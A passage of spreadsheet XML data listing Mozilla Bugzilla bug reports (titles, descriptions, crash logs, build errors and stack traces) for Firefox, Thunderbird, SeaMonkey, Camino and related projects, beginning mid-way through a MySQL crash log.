thd-&gt;query at 0x259fb570 = SELECT IF(right( NAME_CONST('_value'_utf8'zh_tw/Core_JavaScript_1.5_æ•™å­¸/å»ºç«‹æ–°çš„ç‰©ä»¶/Defining_Methods\0zh_tw/Core_JavaScript_1.5_æ•™å­¸/å»ºç«‹æ–°çš„ç‰©ä»¶/Using_this_for_Object_References\0zh_tw/Core_JavaScript_1.5_æ•™å­¸/å»ºç«‹æ–°çš„ç‰©ä»¶/Defining_Getters_and_Setters\0zh_tw/Core_JavaScript_1.5_æ•™å­¸/å»ºç«‹æ–°çš„ç‰©ä»¶/Deleting_Properties\0zh_tw/Core_JavaScript_1.5_æ•™å­¸/é å…ˆå®šç¾©çš„æ ¸å¿ƒç‰©ä»¶\0zh_tw/Core_JavaScript_1.5_æ•™å­¸/é å…ˆå®šç¾©çš„æ ¸å¿ƒç‰©ä»¶/Array_Object\0zh_tw/Core_JavaScript_1.5_æ•™å­¸/é å…ˆå®šç¾©çš„æ ¸å¿ƒç‰©ä»¶/Boolean_Object\0zh_tw/Core_JavaScript_1.5_æ•™å­¸/é å…ˆå®šç¾©çš„æ ¸å¿ƒç‰©ä»¶/Date_Object\0zh_tw/Core_JavaScript_1.5_æ•™å­¸/é å…ˆå®šç¾©çš„æ ¸å¿ƒç‰©ä»¶/Function_Object\0zh_tw/Core_JavaScript_1.5_æ•™å­¸/é å…ˆå®šç¾©çš„æ ¸å¿ƒç‰©ä»¶/Math_Object\0zh_tw/Core_JavaScript_1.5_æ•™å­¸/é å…ˆå®šç¾©çš„æ ¸å¿ƒç‰©ä»¶/Number_Object\0zh_tw/Core_JavaScript_1.5_æ•™å­¸/é å…ˆå®šç¾©çš„æ ¸å¿ƒç‰©ä»¶/RegExp_Object\0zh_tw/Core_JavaScript_1.5_æ•™å­¸/é å…ˆå®šç¾©çš„æ ¸å¿ƒç‰©ä»¶/String_Object\0zh
thd-&gt;thread_id=1107
The manual page at http://www.mysql.com/doc/en/Crashing.html contains
information that should help you find out what is causing the crash.
Fatal signal 11 while backtracing</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-949660</t>
  </si>
  <si>
    <t>Need a license key for Visual Studio 2012 Professional</t>
  </si>
  <si>
    <t>I installed it on a VM on my new machine.</t>
  </si>
  <si>
    <t>desktop-support</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-295711</t>
  </si>
  <si>
    <t>Make DOMI a real extension and cut the app-specific crap</t>
  </si>
  <si>
    <t>DOMI should be a real extension installed in /extensions and managed
through the extension manager.
Making this patch has revealed some unfortunate side effects of the
seamonkey/firefox split especially WRT mac overlays. We really to get a group
together to sit down and seriously map out a strategy for mac menus in xulrunner
apps and extensions.</t>
  </si>
  <si>
    <t>CORE-12430</t>
  </si>
  <si>
    <t>[feature] need sprintf support for unichar strings</t>
  </si>
  <si>
    <t>Dan: I am not quite sure what do you need here.
I assume you need to following
1.The output buffer is a nsString
2. The input format string is a nsString
3. It take variable length of nsString argument and the argument can only be
nsString
4. The format string may include position argument  e.g. %3$s %2$s %1$s etc
5. It does not need other type of argument than nsString</t>
  </si>
  <si>
    <t>FIREFOX-353652</t>
  </si>
  <si>
    <t>Undo closed tab has stopped working</t>
  </si>
  <si>
    <t>Steps to reproduce:
1) Open a tab
2) Close it
3) Try to unclose it
Actual results: No context menu entry on tab strip 'recently closed tabs' entry in history menu disabled and the following in the error console (when opening history menu).
Error: this._windows[aWindow.__SSi] has no properties
Source File: file:///F:/Program%20Files/Mozilla%20Firefox/components/nsSessionStore.js
Line: 648
Error: uncaught exception: [Exception... '[JavaScript Error: this._windows[aWindow.__SSi] has no properties {file: file:///F:/Program%20Files/Mozilla%20Firefox/components/nsSessionStore.js line: 648}]' when calling method: [nsISessionStore::getClosedTabCount]  nsresult: 0x80570021 (NS_ERROR_XPC_JAVASCRIPT_ERROR_WITH_DETAILS)  location: JS frame :: chrome://browser/content/browser.js :: PHM_toggleRecentlyClosedTabs :: line 6674  data: yes]
Expected results: Get my tab back
Test builds: Minefield/20060920 and Minefield/20060921.
Occurs in safe mode as well.
N.B. In my profile I have a file named 'sessionstore.ini' that lists websites I last visited several weeks ago but nothing from the last session I had.</t>
  </si>
  <si>
    <t>bugzilla1</t>
  </si>
  <si>
    <t>CORE-533042</t>
  </si>
  <si>
    <t>TM: Loops with JSOP_GOTO at tail do not compile properly</t>
  </si>
  <si>
    <t>This is a regression from late March RecordLoopEdge accidentally tries to perform tree calls on its own loop header if the tail has JSOP_GOTO instead of JSOP_IFNE. Best case the loop never compiles. Worst case we record until the cache flushes.
Simple test case is something like:
function f(c) {
  for () {
    switch (c) {
    }
  }
}
I ran into this problem after writing a small LC3 simulator to benchmark more complex merge traces. Right now we don't compile anything:
TM       : 3056ms
TM w/ -j : 3051ms
v8       : 395ms</t>
  </si>
  <si>
    <t>CORE-335733</t>
  </si>
  <si>
    <t>FindChildWithRules should use an MRU cache</t>
  </si>
  <si>
    <t>There's currently no good reason for nsStyleContext's child lists to be doubly linked.  Furthermore making them singly linked would force insertion at the beginning of the list which would make the optimization in FindChildWithRules considerably more useful I suspect since it would look at the 10 most recently created children instead of the 10 least.  FindChildWithRules could even promote to the beginning of the list (and could also not have duplicated code for the two child lists).</t>
  </si>
  <si>
    <t>TESTING_GRAVEYARD-519690</t>
  </si>
  <si>
    <t>Mozmill JSON parser for Lookup elements fails if a / is contained in an identifier</t>
  </si>
  <si>
    <t>If you are using a lookup string which contains a / inside of an identifier the JSON parser fails:
Error: /id(main-window)/id(navigator-toolbox)/id(nav-bar)/id(search-container)/id(searchbar)/anon({anonid:searchbar-textbox})/anon({anonid:searchbar-engine-button})/anon({anonid:searchbar-popup})/id(Gutscheine/Rabatte)
Error: SyntaxError: JSON.parse. String to be parsed was || Gutschein  ||
Source File: file:///Volumes/data/build/tools/mozmill/mozmill/extension/resource/modules/frame.js
Line: 470</t>
  </si>
  <si>
    <t>CORE-788957</t>
  </si>
  <si>
    <t>Avoid duplication of fields in SharedContext and FunctionBox</t>
  </si>
  <si>
    <t>SharedContext and FunctionBox both have |strictModeState| and |cxFlags| 
fields.  This is confusing.  This bug will remove SharedContext's 
copies of these fields.</t>
  </si>
  <si>
    <t>BUGZILLA-71664</t>
  </si>
  <si>
    <t>No bug record listed as bad keyword cache.</t>
  </si>
  <si>
    <t>Somehow bugzilla.mozilla.org ended up with various records for bug #8388607 (see
bug #69629) but no bug record.
Whatever then happened was sanitycheck.cgi complained that there was a corrupted
keyword cache and asked whether it should have been fixed.  But there was
nothing to be fixed so it has just stayed there.
In 2.11 checks various referential checks were added to detect this in other
ways so bugs should only be listed as having a bad keyword cache if the bug
record actually exists.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-388596</t>
  </si>
  <si>
    <t>[uk] locale-inspector fail on accelerator keys</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 (x86_64) en-US rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5
Build Identifier: 
Unghost reported failing tests on locale-inspector checking
Reproducible: Always</t>
  </si>
  <si>
    <t>tim.babych</t>
  </si>
  <si>
    <t>SEAMONKEY-175690</t>
  </si>
  <si>
    <t>Window mini icon not showing when compiled with Xft support</t>
  </si>
  <si>
    <t>Having tried the standard Mozilla 1.2b as well as the last two Xft snapshot RPMs
(on RH8) I notice that the mini icon does not show for Mozilla Xft. A bit
annoying seeing the blank default icon!</t>
  </si>
  <si>
    <t>salimma</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-347206</t>
  </si>
  <si>
    <t>Add support for clicking on the throbber</t>
  </si>
  <si>
    <t>Adding back support for clicking on the throbber and going to a URL.</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-238484</t>
  </si>
  <si>
    <t>XUL Samples broken link.</t>
  </si>
  <si>
    <t>In section Miscellaneous subsection Sample Code and Technical Notes link to
XUL Samples ( http://www.mozilla.org/docs/xul/samples/ ) is 404. Either drop the
link or find the new location of /docs/xul/samples/. I searched and couldn't the
new hiding place for /docs/xul/samples/.</t>
  </si>
  <si>
    <t>sime</t>
  </si>
  <si>
    <t>BUGZILLA-163290</t>
  </si>
  <si>
    <t>Move DB handling code into a module</t>
  </si>
  <si>
    <t>I've started hacking on this. It makes lots of stuff a lot cleaner.</t>
  </si>
  <si>
    <t>CORE-351231</t>
  </si>
  <si>
    <t>dereferencing type-punned pointer will break strict-aliasing in nsCOMPtr</t>
  </si>
  <si>
    <t>Gcc 4.1 with optimization emits about 30000 warnings about dereferencing type-punned pointers in nsCOMPtr.h and nsCOMPtr.cpp e.g.
.../nsCOMPtr.h: In member function 'void nsCOMPtr::assign_from_qi(nsQueryInterface const nsIID&amp;) [with T = nsIArray]':
.../nsCOMPtr.h:645:   instantiated from 'nsCOMPtr::nsCOMPtr(nsQuery Interface) [with T = nsIArray]'
...nsCOMPtr.h:593:   instantiated from 'void nsCOMPtr::Assert_NoQueryNeeded() [with T = nsIArray]'
/extra/kherron/moz3/ff/../mozilla/xpcom/glue/nsCOMPtr.h:629:   instantiated from 'nsCOMPtr::nsCOMPtr(T*) [with T = nsIArray]'
.../nsArrayEnumerator.cpp:58:   instantiated from here
.../nsCOMPtr.h:1232: warning: dereferencing type-punned pointer will break strict-aliasing rules
In all gcc complains about 7 sites in nsCOMPtr.cpp and 8 sites in nsCOMPtr.h:
http://bonsai.mozilla.org/cvsblame.cgi?file=mozilla/xpcom/glue/nsCOMPtr.cpp&amp;rev=1.24&amp;mark=96105114123132141150#92
http://bonsai.mozilla.org/cvsblame.cgi?file=mozilla/xpcom/glue/nsCOMPtr.h&amp;rev=1.122&amp;mark=12321242125212621272128212921302#1227
How to reproduce:
1) Install gcc 4.1 (or maybe 3.3 or later)
2) Compile mozilla with optimization -Os -O2 or -O3.</t>
  </si>
  <si>
    <t>CALENDAR-164869</t>
  </si>
  <si>
    <t>Menu to show/hide window elements</t>
  </si>
  <si>
    <t>A View Show/Hide menu could be usefull to show/hide some elements to clean up 
the window area items like:
Toolbar
Statusbar
Calendars
Tasks</t>
  </si>
  <si>
    <t>SEAMONKEY-149390</t>
  </si>
  <si>
    <t>mozilla-js.pc error in Libs</t>
  </si>
  <si>
    <t>mozilla-js.pc has -js in Libs this should be replaced with -lmozjs.</t>
  </si>
  <si>
    <t>FIREFOX-451702</t>
  </si>
  <si>
    <t>remove unneeded global variables</t>
  </si>
  <si>
    <t>... such as _dirty (can be replaced by a function argument) or _lastSessionCrashed (used inside one function only).</t>
  </si>
  <si>
    <t>TOOLKIT-448652</t>
  </si>
  <si>
    <t>Very Long URL seems to be blocked by Security Zone Policy</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 de rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 de rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1
The Download of resources with very long URLs (i.e. 1683 Characters and more) seems to be blocked by Security Zone Policy. Slightly shorter URLs (i.e. 1674) from the same domain do not have that problem.
The Example-URL will only work if you are logged in at zyb.com (registration is free) - I am sorry about that but I am not aware of other public servers that generate urls long enough.
Reproducible: Always
Steps to Reproduce:
1. Log-in at zyb.com (any login should do)
2. Enter / select the URL mentioned above
3. When ask what to do select Save File
4. Select Path and Filename
Actual Results:  
The file is generated with file size 0 and without content.
In the Downloads List the File is listed along with the error Message
This download has been blocked by your Security Zone Policy (in my German Version Dieser Download wurde durch Ihre Sicherheitszonen-Regel blockiert)
Expected Results:  
The file should be properly saved instead. When I use a shorter link (Example below) it is.
Additionally I would expect some kind of notification if a download fails. With the zero-size file and no visible message one might wrongly assume that the download was successful.
I am using a German version of Firefox so sorry in case I mistranslated some the messages that Firefox generates!
The Examples have been anonymized -- therefore a successful download will also generate a zero-size file but no error message in the downloads. If you substitute the 12345678's by the number of an actual ZYB-Contact the successful download will provide a file with data the non-successfull will still provide an empty file.
Some URL that will *not* generate an Error:
http://zyb.com/core/contacts/export/?ids=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
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
Some URL that will generate the Error:
http://zyb.com/core/contacts/export/?ids=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
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12345678</t>
  </si>
  <si>
    <t>CORE-370875</t>
  </si>
  <si>
    <t>ASSERTION: nsSecureBrowserUIImpl not thread-safe * 4 loading any https site</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. Load https://www.paypal.com/ or https://bugzilla.mozilla.org/ with Firefox (debug trunk build on Intel Mac).
###!!! ASSERTION: nsSecureBrowserUIImpl not thread-safe: '_mOwningThread.GetThread() == PR_GetCurrentThread()' file /Users/jruderman/trunk/mozilla/security/manager/boot/src/nsSecureBrowserUIImpl.cpp line 173
This regressed within the last few days.</t>
  </si>
  <si>
    <t>CORE-91557</t>
  </si>
  <si>
    <t>constructor property of DOM Object instances return incorrect constructor</t>
  </si>
  <si>
    <t>In recent builds (July 19)the constructor property of (mostif not all) DOM 
object instances  return the Object object.
For example:
document.body.constructor==HTMLBodyElement //returns false should return true</t>
  </si>
  <si>
    <t>tfriesen</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-131206</t>
  </si>
  <si>
    <t>antennaweb.org - Links on left side of page do not work.</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows U WinNT4.0 en-US rv:0.9.9+) Gecko/20020311
BuildID:    2002031103
The links on the left side of the page at http://www.antennaweb.org/ do NOT
work.  They work fine in Netscape 4.7x.
Reproducible: Always
Steps to Reproduce:
1.Go to http://www.antennaweb.org/
2.Try to click on any of the links on the left side of the page
3.Get HTTP 404 errors in frame on left side of page.
Actual Results:  Links result in HTTP 404 not found errors which is incorrect.
Expected Results:  The pages the links refer to should be displayed.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-431252</t>
  </si>
  <si>
    <t>The hg.mozilla.org web interface won't load some source files</t>
  </si>
  <si>
    <t>I'm having varying success loading source files using hg.mozilla.org's web interface.  For example the following link never loads for me:
http://hg.mozilla.org/webtools/mxr/index.cgi/file/95c95aed0c15/search
while this one will:
http://hg.mozilla.org/webtools/mxr/index.cgi/file/95c95aed0c15/nspr
Randomly clicking files seems to indicate than small files load and larger ones don't.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-502225</t>
  </si>
  <si>
    <t>[silme] update compare-locales to silme 0.8</t>
  </si>
  <si>
    <t>bug for updating compare-locales to silme 0.7</t>
  </si>
  <si>
    <t>SKYWRITER_GRAVEYARD-480982</t>
  </si>
  <si>
    <t>When you click on a project int the dashboard set that to be the context for project</t>
  </si>
  <si>
    <t>When you click on a project in the left of the dashboard fire of an event:
bespin.publish(bespin:editor:project:set { project: project })
This way if you do an ls or the like the context it set correctly.</t>
  </si>
  <si>
    <t>BUGZILLA-282597</t>
  </si>
  <si>
    <t>GetGroupsByUserId() in buglist.cgi fails to return correct information</t>
  </si>
  <si>
    <t>When editing multiple bugs at once the groupset table is partially empty due to
a regression from bug 278018. This is because GetGroupsByUserId() in buglist.cgi
does not return correct informations. Patch coming...</t>
  </si>
  <si>
    <t>THUNDERBIRD-396874</t>
  </si>
  <si>
    <t>copy sent mail into sent-mail folder failed [imap offline folder disabled]</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 de rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7
Build Identifier: Version 2.0.0.6 (20070728)
System Description:
Client: Windows XP actually patches
Server: SuSE Enterprise 9 Courier IMAP 4.1.1
After Thunderbird 2.0.0.6 works proper suddenly a sended mail is not copied in to the sent-mail folder. 
Workaround-1:
- The Sending Messages dialog appears 60 minutes if i take this time. After 60 minutes i received the message:
message Cant be Copied into folder sent-mail 
CANCEL OR RETRY
- After pressing Cancel the dialogbox:
Sending of message is failed
The message was sent successfully but copy to the folder was failed  
Would you go back to compose the message? OK or CANCEL
- If i choose OK i receive the following messagebox 3 times
Warning
This Mail Server mail1.uniklinik-freiburg.de is not a IMAP-4-Server
OK
(note: our imap server is a IMAP-4 Server)
- Now i get the message compose dialogbox i can save the message as draft can open it and may be send another time sometimes succesfully sometimes the error repeads
Workaround-2 
- The Sending Messages dialog appears after some minutes i cancel the copy proccess.
- Now i returned to the Thunderbird main window but now the mousepointer is a hourglass
- often i can open the mailfolders by clicking the folder symbols in the left colum the messages in the right window appears and i i choose a message i get the message text
- sometimes this dos not works
- i have to close Thunderbird and restart it
See the attached dialog
Reproducible: Sometimes
Steps to Reproduce:
1. Start and wait between some minutes or some hours
2. havent found a way to force the error
There are may be other bugreports in the same way:
- Bug No. 206408 298229 392622 390136 380238 382912 378735 376518 ...?
We cant migrate to Thunderbird 2.x until this error occured.</t>
  </si>
  <si>
    <t>rieder</t>
  </si>
  <si>
    <t>CORE-510149</t>
  </si>
  <si>
    <t>Changes to nsLayoutUtils::GetFrameTransparency</t>
  </si>
  <si>
    <t>Created attachment 394210
v1
We shouldn't be checking for glass twice.
This is basically refactoring with the only semantic difference that we now check for opacity and rounded corners on the root style frame and not on the real canvas root frame. I'm not sure if that's a good idea since rounded corners and opacity won't cause the window to become transparent because we still draw the opaque background (which propagates to the root canvas frame) behind them.</t>
  </si>
  <si>
    <t>CORE-403005</t>
  </si>
  <si>
    <t>Popup window briefly pops up then closes immediately</t>
  </si>
  <si>
    <t>From bug 390833 comment 11:
I found another bug. You can no longer pop up the sub windows into a separate
firefox window. When you click on the button in the top right corner Firefox
briefly pops up a window and then immediately closes it again.
To reproduce:
- Log in with one of the accounts.
- Click on the open in new window icon in the window at the right at the top right.
This regressed between 2007-07-26 and 2007-07-27:
http://bonsai.mozilla.org/cvsquery.cgi?treeid=default&amp;module=all&amp;branch=HEAD&amp;branchtype=match&amp;dir=&amp;file=&amp;filetype=match&amp;who=&amp;whotype=match&amp;sortby=Date&amp;hours=2&amp;date=explicit&amp;mindate=2007-07-26+04&amp;maxdate=2007-07-27+06&amp;cvsroot=%2Fcvsroot
I guess a regression from bug 194404 then.</t>
  </si>
  <si>
    <t>CORE-722840</t>
  </si>
  <si>
    <t>Add inherited private browsing attribute to docshells</t>
  </si>
  <si>
    <t>A given docshell will be the canonical way to determine the state of Private Browsing in the brave new per-window world.</t>
  </si>
  <si>
    <t>FIREFOX-408896</t>
  </si>
  <si>
    <t>In a frame of a multi-frame window JavaScript methods location.replace() or .assign() or .href = do not replace the URL in the frame if these methods are called after a location.reload() command has been executed.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8.0.13pre) Gecko/20071126 Ubuntu/dapper-security Firefox/1.5.0.13pre
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8.0.13pre) Gecko/20071126 Ubuntu/dapper-security Firefox/1.5.0.13pre
To give an example initially the following method works fine when the program starts up and it does replace the URL in the frame where the old URL was loading.htm and the new URL is getuser.htm:
	parent.contentFrame.document.location.replace(getuserfile)
This command works therefore the method itself functions in Firefox.
However this method does not always function. This and other methods worked consistently in previous versions of Firefox and even in the IE browser. They still work in the IE browser but not in recent Firefox versions those released in updates during the last couple of months. As far as I can tell when the URLs on two frames are accessed in sequential commands then something blows up. For example these are two sequential commands in a function which used to work fine but now does not work in recent Firefox versions (neither in Linux nor Windows OS):
	parent.navscrn.document.location.reload()
	parent.contentFrame.document.location.replace(LessonURL)
If I look at the variable LessonURL immediately before the location.replace() method is called it is correct. However the location.href is exactly the same for the frame both before and after these commands are executed. The location.reload() method is executed and so is the location.replace() method but the URL is not changed to the new one.
I have also tried the following alternative methods using both variables and literal strings:
	parent.contentFrame.document.location.href = LessonURL
	parent.contentFrame.document.location.assign(LessonURL)
	parent.contentFrame.window.location.replace(LessonURL)
	parent.contentFrame.window.location.href = LessonURL
	parent.contentFrame.window.location.assign(LessonURL)
	parent.contentFrame.document.location.assign(file:///home/greg/Desktop/Greek%20Web%20Site/newfile.htm)
	parent.contentFrame.document.location.assign(file:///home/greg/Desktop/Greek Web Site/newfile.htm)
None of these methods work. I also tried the following commands to set the LessonURL to include the protocol:
	var tempLoc = parent.contentFrame.document.location.href
	// and also tried: var tempLoc = unescape(parent.contentFrame.document.location.href)
	tempLoc = tempLoc.substring(0tempLoc.lastIndexOf(/)+1) + LessonURL
	parent.contentFrame.document.location.assign(tempLoc)
I have tried almost every combination I can think of at this time. This is likely a bug reported elsewhere by now but I cannot find it in your database. So I am reporting it again.
Thanks. Greg.
Reproducible: Always
Steps to Reproduce:
1
2.
3.</t>
  </si>
  <si>
    <t>salttalk</t>
  </si>
  <si>
    <t>SEAMONKEY-84539</t>
  </si>
  <si>
    <t>Simple Sample Plugin should not be exported to dist</t>
  </si>
  <si>
    <t>The simple sample plugin (libnpsimple.so on linux) should not be exported to the
dist directory when building. It should probably be built (to make sure it
always works etc.) but shouldn't be an installed plugin.
The fix for this is likely a line of code in a couple makefiles.</t>
  </si>
  <si>
    <t>CORE-233631</t>
  </si>
  <si>
    <t>GetApplicationLocale should not be used with FormatTime methods in order to support user's customisation (OS X is affected)</t>
  </si>
  <si>
    <t>User-Agent:       
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-GB rv:1.6) Gecko/20040113
Mozilla does not honour the long date and time format defined by the OS X. In
the test case I tried to set the Date format to the one used in any other
country and on the screenshot I used French with some modifications. The OS X
itself is en-US and version is 10.2.6. 
Reproducible: Always
Steps to Reproduce:
1. Open System Prefs choose International change Date format to French (just
as an example and assuming that your default locale is not French). Change Time
format to French as well. 
2. One Page Info in Mozilla. 
Actual Results:  
One sees the wrong format of the long date (in Page Info for example).
Expected Results:  
One sees the right format of the long date (in Page Info for example).</t>
  </si>
  <si>
    <t>CORE-896280</t>
  </si>
  <si>
    <t>Pass MutableHandleValue to JS::Call()</t>
  </si>
  <si>
    <t>Created attachment 778981
Patch v1</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-876784</t>
  </si>
  <si>
    <t>Direct crontab emails on buildapi to release@mozilla.com</t>
  </si>
  <si>
    <t>Currently MAILTO is not set for these cron jobs so it ends up in the local mail spool.</t>
  </si>
  <si>
    <t>jhopkins</t>
  </si>
  <si>
    <t>CALENDAR-386370</t>
  </si>
  <si>
    <t>Provide more localization possibilities</t>
  </si>
  <si>
    <t>Created attachment 270361
Allow more localization - v1
Allow description and title localization for mozilla1.8 for gecko 1.9 see [1]. Also adds other preferences in the default prefs file.
http://developer.mozilla.org/en/docs/Localizing_extension_descriptions</t>
  </si>
  <si>
    <t>CORE-29548</t>
  </si>
  <si>
    <t>Missing focus notification when clicking in URL bar</t>
  </si>
  <si>
    <t>When clicking between the URL bar and the browser content I used to get a focus 
event when the URL bar gains focus. This no longer happens which means that 
certain menu items like Paste are never enabled properly.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-498708</t>
  </si>
  <si>
    <t>Open URL in Camino service name not localizable</t>
  </si>
  <si>
    <t>I noticed while looking at the Chinese 1.6.x that other apps' Services displayed in the menu with localized names while ours doesn't.
We should just need to add that string to InfoPlist.strings for 2.0.</t>
  </si>
  <si>
    <t>CORE-361340</t>
  </si>
  <si>
    <t>Mingw build error in SpecialSystemDirectory.cpp error: `::SHGetSpecialFolderPathW' has not been declared</t>
  </si>
  <si>
    <t>After updating my Mozilla mingw build I get this build error:
=1 -DMOZ_SAFE_BROWSING=1 -DMOZ_URL_CLASSIFIER=1 -DMOZ_LOGGING=1 -DHAVE___CXA_DEM
ANGLE=1 -DMOZ_DEMANGLE_SYMBOLS=1 -DMOZ_USER_DIR=\Mozilla\ -DHAVE_STDINT_H=1 -D
HAVE_INTTYPES_H=1 -DHAVE_UINT64_T=1 -DMOZ_XUL=1 -DMOZ_PROFILELOCKING=1 -DMOZ_RDF
=1 -DMOZ_MORK=1 -DMOZ_MORKREADER=1 -DMOZ_DLL_SUFFIX=\.dll\ -DJS_THREADSAFE=1 -
DMOZ_REFLOW_PERF=1 -DMOZ_REFLOW_PERF_DSP=1 -DMOZILLA_LOCALE_VERSION=\1.9a1\ -D
MOZILLA_REGION_VERSION=\1.9a1\ -DMOZILLA_SKIN_VERSION=\1.8\  -D_MOZILLA_CONF
IG_H_ -DMOZILLA_CLIENT /cygdrive/c/mozilla/mozilla/xpcom/io/SpecialSystemDirecto
ry.cpp
c:/mozilla/mozilla/xpcom/io/SpecialSystemDirectory.cpp: In function `nsresult Ge
tWindowsFolder(int nsILocalFile**)':
c:/mozilla/mozilla/xpcom/io/SpecialSystemDirectory.cpp:177: error: `::SHGetSpecialFolderPathW' has not been declared
make[5]: *** [SpecialSystemDirectory.o] Error 1
make[5]: Leaving directory `/cygdrive/c/mozilla/mozilla/xpcom/io'
make[4]: *** [libs] Error 2
make[4]: Leaving directory `/cygdrive/c/mozilla/mozilla/xpcom'
make[3]: *** [libs_tier_xpcom] Error 2
make[3]: Leaving directory `/cygdrive/c/mozilla/mozilla'
make[2]: *** [tier_xpcom] Error 2
make[2]: Leaving directory `/cygdrive/c/mozilla/mozilla'
make[1]: *** [alldep] Error 2
make[1]: Leaving directory `/cygdrive/c/mozilla/mozilla'
make: *** [alldep] Error 2
I suspect this is caused by the fix for bug 359808 somehow.</t>
  </si>
  <si>
    <t>CORE-306049</t>
  </si>
  <si>
    <t>Crash in nsFrame::PeekOffsetParagraph when triple-clicking not in a block</t>
  </si>
  <si>
    <t>I've just checked in a patch to implement SVG events. In the process of testing
them I've encountered a crash that seems unrelated. To reproduce this crash load
the testcase and click on the small inner (zoom out) circle multiple times.
gklayout.dll!nsFrame::PeekOffsetParagraph(nsPresContext *
aPresContext=0x032cc490 nsPeekOffsetStruct * aPos=0x0012eee8)  Line 3536 + 0x10	C++
gklayout.dll!nsFrame::PeekOffset(nsPresContext * aPresContext=0x032cc490
nsPeekOffsetStruct * aPos=0x0012eee8)  Line 3846 + 0x17	C++
gklayout.dll!nsFrame::PeekBackwardAndForward(nsSelectionAmount
aAmountBack=eSelectParagraph nsSelectionAmount aAmountForward=eSelectParagraph
int aStartPos=3 nsPresContext * aPresContext=0x032cc490 int aJumpLines=1) 
Line 1649 + 0x1a	C++
gklayout.dll!nsFrame::HandleMultiplePress(nsPresContext *
aPresContext=0x032cc490 nsGUIEvent * aEvent=0x0012f5d4 nsEventStatus *
aEventStatus=0x0012f33c)  Line 1615 + 0x38	C++
gklayout.dll!nsFrame::HandlePress(nsPresContext * aPresContext=0x032cc490
nsGUIEvent * aEvent=0x0012f5d4 nsEventStatus * aEventStatus=0x0012f33c)  Line
1357 + 0x1b	C++
gklayout.dll!nsFrame::HandleEvent(nsPresContext * aPresContext=0x032cc490
nsGUIEvent * aEvent=0x0012f5d4 nsEventStatus * aEventStatus=0x0012f33c)  Line
980	C++
gklayout.dll!PresShell::HandleEventInternal(nsEvent * aEvent=0x0012f5d4 nsIView
* aView=0x03345ef0 unsigned int aFlags=1 nsEventStatus * aStatus=0x0012f33c) 
Line 6256 + 0x27	C++
gklayout.dll!PresShell::HandleEvent(nsIView * aView=0x03345ef0 nsGUIEvent *
aEvent=0x0012f5d4 nsEventStatus * aEventStatus=0x0012f33c int aForceHandle=0
int &amp; aHandled=1)  Line 6047 + 0x19	C++
gklayout.dll!nsViewManager::HandleEvent(nsView * aView=0x0334cf50 nsPoint
aPoint={...} nsGUIEvent * aEvent=0x0012f5d4 int aCaptured=0)  Line 2553	C++
gklayout.dll!nsViewManager::DispatchEvent(nsGUIEvent * aEvent=0x0012f5d4
nsEventStatus * aStatus=0x0012f4b0)  Line 2245 + 0x22	C++
gklayout.dll!HandleEvent(nsGUIEvent * aEvent=0x0012f5d4)  Line 174	C++
gkwidget.dll!nsWindow::DispatchEvent(nsGUIEvent * event=0x0012f5d4
nsEventStatus &amp; aStatus=nsEventStatus_eIgnore)  Line 1061 + 0xa	C++
gkwidget.dll!nsWindow::DispatchWindowEvent(nsGUIEvent * event=0x0012f5d4) 
Line 1082	C++
gkwidget.dll!nsWindow::DispatchMouseEvent(unsigned int aEventType=302 unsigned
int wParam=1 nsPoint * aPoint=0x00000000)  Line 5803 + 0x15	C++
gkwidget.dll!ChildWindow::DispatchMouseEvent(unsigned int aEventType=302
unsigned int wParam=1 nsPoint * aPoint=0x00000000)  Line 6057	C++
gkwidget.dll!nsWindow::ProcessMessage(unsigned int msg=513 unsigned int
wParam=1 long lParam=6815854 long * aRetValue=0x0012faa8)  Line 4379 + 0x1c	C++
gkwidget.dll!nsWindow::WindowProc(HWND__ * hWnd=0x00070746 unsigned int
msg=513 unsigned int wParam=1 long lParam=6815854)  Line 1243 + 0x1b	C++</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-437761</t>
  </si>
  <si>
    <t>GCC 4.2.1 - build fails with errors</t>
  </si>
  <si>
    <t>Created attachment 324135
Build log
Building Camino Trunk with GCC 4.2.1 (iPhone SDK beta 6) fails.
Here are the steps I have taken:
1. Pulled a fresh Trunk tree from CVS.
2. Applied patch for bug 423405 (updated patch).
3. Start the build process.</t>
  </si>
  <si>
    <t>krmathis</t>
  </si>
  <si>
    <t>CORE-380970</t>
  </si>
  <si>
    <t>Change the URI argument to Components.utils.import</t>
  </si>
  <si>
    <t>Right now it uses the ancient rel: abs: etc format. It shouldn't since they end up in the components dir where they don't belong.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-324631</t>
  </si>
  <si>
    <t>l10n tooling setup</t>
  </si>
  <si>
    <t>There are a few open ends with the setup of the webtools for l10n.
The list I have on my head are lxr/bonsai link roundtrips cvs graphs in bonsai
not all users resolving in bonsai queries (uid??? showing up instead) and 
check-ins not listed on tinderbox pages.
I'l leave it up to you whether you prefer separate bugs for those if you do I'll 
file them and make them block this one.</t>
  </si>
  <si>
    <t>CORE-70704</t>
  </si>
  <si>
